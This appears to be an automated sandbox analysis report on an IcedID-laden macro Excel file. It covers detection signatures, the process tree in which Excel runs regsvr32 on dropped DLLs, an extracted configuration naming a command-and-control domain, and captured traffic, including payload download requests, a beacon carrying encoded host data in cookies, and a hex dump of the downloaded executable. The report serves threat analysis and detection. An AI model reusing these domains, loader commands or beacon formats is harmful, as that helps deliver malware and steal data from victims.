Play interactive tour

Edit tour

Windows Analysis Report List-4527768.xlsm

Overview

General Information

Sample Name:	List-4527768.xlsm
Analysis ID:	444724
MD5:	a4e97ce76c7a39ee9fa541a3c660a333
SHA1:	e3bb71833f604da1920424049ea0c15912a6a6b7
SHA256:	56b6de63e55ae6d81433f309af5b5d29ccfe7ec9d45c644572029256eb2c6e41
Tags:	IcedIDxlsm
Infos:
Most interesting Screenshot:

Detection

IcedID

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

System process connects to network (likely due to code injection or exploit)

Yara detected IcedID

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Tries to detect virtualization through RDTSC time measurements

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query network adapater information

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Excel documents contains an embedded macro which executes code when the document is opened

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains an invalid checksum

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Registers a DLL

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2632 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

regsvr32.exe (PID: 3016 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 3024 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2292 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)

cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security
00000004.00000002.2088537006.0000000000110000.00000004.00000001.sdmp	MAL_IcedID_GZIP_LDR_202104	2021 initial Bokbot / Icedid loader for fake GZIP payloads	Thomas Barabosch, Telekom Security	0x27c6:$internal_name: loader_dll_64.dll 0x30b4:$string0: _gat= 0x3114:$string1: _ga= 0x30ec:$string2: _gid= 0x30cc:$string3: _u= 0x3026:$string4: _io= 0x30d8:$string5: GetAdaptersInfo 0x2b16:$string6: WINHTTP.dll 0x27ea:$string7: DllRegisterServer 0x27fc:$string8: PluginInit 0x3080:$string9: POST 0x3140:$string10: aws.amazon.com
Process Memory Space: regsvr32.exe PID: 3024	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.regsvr32.exe.110000.0.unpack	MAL_IcedID_GZIP_LDR_202104	2021 initial Bokbot / Icedid loader for fake GZIP payloads	Thomas Barabosch, Telekom Security	0x1bc6:$internal_name: loader_dll_64.dll 0x1f16:$string6: WINHTTP.dll 0x1bea:$string7: DllRegisterServer 0x1bfc:$string8: PluginInit
4.2.regsvr32.exe.110000.0.raw.unpack	MAL_IcedID_GZIP_LDR_202104	2021 initial Bokbot / Icedid loader for fake GZIP payloads	Thomas Barabosch, Telekom Security	0x27c6:$internal_name: loader_dll_64.dll 0x30b4:$string0: _gat= 0x3114:$string1: _ga= 0x30ec:$string2: _gid= 0x30cc:$string3: _u= 0x3026:$string4: _io= 0x30d8:$string5: GetAdaptersInfo 0x2b16:$string6: WINHTTP.dll 0x27ea:$string7: DllRegisterServer 0x27fc:$string8: PluginInit 0x3080:$string9: POST 0x3140:$string10: aws.amazon.com
4.2.regsvr32.exe.21a0000.4.unpack	MAL_IcedID_GZIP_LDR_202104	2021 initial Bokbot / Icedid loader for fake GZIP payloads	Thomas Barabosch, Telekom Security	0x27c6:$internal_name: loader_dll_64.dll 0x30bc:$string0: _gat= 0x311c:$string1: _ga= 0x30f4:$string2: _gid= 0x30d4:$string3: _u= 0x302e:$string4: _io= 0x30e0:$string5: GetAdaptersInfo 0x2b16:$string6: WINHTTP.dll 0x27ea:$string7: DllRegisterServer 0x27fc:$string8: PluginInit 0x3088:$string9: POST 0x3148:$string10: aws.amazon.com

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2632, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 3016

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.regsvr32.exe.21a0000.4.unpack

Malware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 3024, type: MEMORY

Source: unknown

HTTPS traffic detected: 13.225.75.73:443 -> 192.168.2.22:49168 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\XTOWN.dll

Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: lsdfik[1].fml.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Source: global traffic

DNS query: name: thousandsyears.download

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 13.225.75.73:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.67.198.51:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: astrocycle.download

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:57:21 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 49Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=e1M4Me9EvuSGct6Mnlt7EmjgYyT7e7QnarjxTYnYSbWpZmw4pdEC3zemXzCxzWNtVc2%2BlHAw4TUkyHOcVcDYdQudq6Qyn7To30GB%2FdxgsttDT34UyvuaTiL15A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a95776c9bf4e2b-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:4921:56; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=373234353336:416C627573:46393135334243344242303836433845; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download

Source: Joe Sandbox View	IP Address: 172.67.198.51 172.67.198.51
Source: Joe Sandbox View	IP Address: 13.225.75.73 13.225.75.73

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 13.225.75.73:443 -> 192.168.2.22:49168 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D613D612.png

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:4921:56; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=373234353336:416C627573:46393135334243344242303836433845; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download

Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a equals www.youtube.com (Youtube)
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
Source: regsvr32.exe, 00000004.00000002.2090433809.00000000031F0000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: X-Amz-Cf-IdtwnA5McuDjWCVqPmvSzFjwOhVi3EM8qxCtjX-apnhrvJH6wDf0e3ww==X-Amz-Cf-PopFRA2-C2X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cl
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: X-Amz-Cf-IdtwnA5McuDjWCVqPmvSzFjwOhVi3EM8qxCtjX-apnhrvJH6wDf0e3ww==X-Amz-Cf-PopFRA2-C2X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cl
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
Source: regsvr32.exe, 00000004.00000003.2085118473.00000000003BC000.00000004.00000001.sdmp	String found in binary or memory: p%Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev 